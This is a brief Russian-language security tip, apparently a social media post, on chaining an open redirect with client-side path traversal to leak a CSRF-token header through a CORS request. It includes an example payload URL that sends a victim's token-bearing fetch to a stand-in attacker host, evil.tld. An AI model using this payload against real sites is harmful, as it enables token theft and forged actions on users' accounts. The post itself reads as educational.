Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос. Например, если приложение через fetch() добавляет заголовок csrfToken при обращении к /api/user, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на /api/user/../redirect?to=evil.tld/corsAllow